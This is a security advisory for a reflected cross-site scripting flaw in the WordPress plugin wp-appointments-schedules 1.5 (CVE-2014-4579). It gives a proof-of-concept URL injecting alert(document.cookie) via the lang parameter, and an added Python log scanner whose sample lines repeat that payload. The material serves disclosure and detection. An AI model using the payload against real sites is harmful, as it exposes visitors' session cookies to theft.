Plugin Details
Plugin Name: wp-plugin : wp-appointments-schedules
Affected Version : 1.5 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/wp-appointments-schedules/js/test.php?lang=">alert(document.cookie)&
Vulnerable Parameter : lang
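Added example (not part of the original advisory and not the plugin's code): a Python check that scans web access log lines for requests to the affected test.php whose lang value is not a plain locale code. The combined log format, the locale pattern and the sample lines are assumptions constructed for illustration; only the path and parameter name come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter name come from the advisory; everything else is assumed.
VULN_PATH = "/wp-content/plugins/wp-appointments-schedules/js/test.php"
PARAM = "lang"
# Assumption: a legitimate value is a short locale code such as "en" or "pt_BR".
SAFE_LANG = re.compile(r"[A-Za-z]{2,3}([_-][A-Za-z0-9]{2,4})?")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_lang_values(line):
    """Return decoded lang values in one log line that are not locale codes."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(VULN_PATH):
        return []
    hits = []
    for value in parse_qs(url.query).get(PARAM, []):
        # parse_qs decodes once; decode again to catch double-encoded input.
        decoded = unquote(value)
        if not SAFE_LANG.fullmatch(decoded):
            hits.append(decoded)
    return hits


def scan(lines):
    """Return (line_number, value) pairs for every flagged request."""
    return [(n, v) for n, line in enumerate(lines, 1)
            for v in suspicious_lang_values(line)]


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2014:10:00:01 +0000] "GET /wp-content/plugins/wp-appointments-schedules/js/test.php?lang=en HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Jun/2014:10:00:05 +0000] "GET /wp-content/plugins/wp-appointments-schedules/js/test.php?lang=%22%3Ealert(document.cookie)& HTTP/1.1" 200 540',
    '192.0.2.12 - - [12/Jun/2014:10:00:09 +0000] "GET /index.php?lang=%22%3Ex HTTP/1.1" 200 900',
    '192.0.2.13 - - [12/Jun/2014:10:00:12 +0000] "GET /wp-content/plugins/wp-appointments-schedules/js/test.php?lang=%2522%253Ex HTTP/1.1" 200 540',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: lang={value!r}")
```

Any hit on a site running the affected version is worth reviewing together with the response status and the referrer of the request.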
Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Status : Updated on
Public Disclosure : June 12, 2014
CVE Number : CVE-2014-4579
Plugin Description :
This WordPress plugin will let you create and manage schedules.
You can add, delete, and manage appointments for each schedule.
Individual schedules can be displayed on the website and may be
enabled to allow online reservations by registered users.
To add a schedule to a page, add "[[DISPLAYSCHEDULE_PAUL]]" to the post in the page of interest for a schedule created with the name "Paul".